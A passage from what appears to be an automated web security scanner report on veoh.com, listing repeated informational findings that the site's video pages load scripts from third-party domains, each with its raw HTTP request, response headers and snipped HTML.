Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=82
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768467"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.415. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296765039"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.416. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3digxLTa3XKZOdgQfJltnlDw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CF0QuAIwCQ\\x26amp;q\\x3dsmartdesis\\x26amp;usg\\x3dAFQjCNGfJXOedr8EFUHoDTuNwPlaSxDDIA\\x22\\x3e\\x3cdiv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768465"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.417. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296765037"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.418. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768462"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.419. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v207484775fTsGMdN&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768553"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.420. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v207490874eKBjfZC&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768533"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.421. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:25 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20749145FCR2QekA&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768505"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.422. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:29 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 134506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20753891TQ237Z7N&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768509"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

